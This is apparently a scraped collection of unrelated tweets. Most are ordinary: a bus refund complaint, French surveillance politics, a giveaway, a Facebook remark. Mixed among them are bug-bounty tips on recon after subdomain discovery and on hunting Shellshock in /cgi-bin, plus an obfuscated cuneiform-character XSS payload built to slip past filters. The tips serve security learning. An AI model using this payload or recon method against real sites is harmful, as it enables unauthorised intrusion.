@FlixBus_FR Your support agents who openly lie to avoid refunding customers, shall we talk about that? Are you going to do something about my refund?
So many beginners ask what to do after finding subdomains 🧵
1. Do directory search
2. Do GitHub dork
3. Do Google dork
4. FUZZ for params
5. FUZZ for vhosts
6. Find Wayback data (gau, waybackurls)
7. Find javascript files
1/n
Another long (hacker) story thread 🧵
= Stealing checks worth millions & pwning a bank =
Here’s how I did it, so you can learn.
I was once contracted to do a penetration test on a bank…
Like, retweet, and follow for more hacker stories!
(1/x)
Still funny, all these people demonstrating this weekend against "generalized surveillance"...
Strangely, we never saw them at our demonstrations against the Loi Renseignement and its recent extension, against mass surveillance, and against LOPPSI back in its day.
We are super excited to have reached 10,000 followers and to celebrate, we're giving away 10 custom SSD hoodies that will get you through winter in style! 🥳
To enter just retweet and leave a comment on this post.
If you see a /cgi-bin directory on a webserver, don't forget to gobuster inside that directory looking for extensions like .sh, .cgi, (and even .py, .pl, or more).... you might be able to find a Shellshock vulnerability. That bug is... still around...
Facebook officially silences the President of the United States. For better or worse, this will be remembered as a turning point in the battle for control over digital speech.
an XSS payload, Cuneiform-alphabet based
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
#bugbounty #bugbountytips #cybersecurity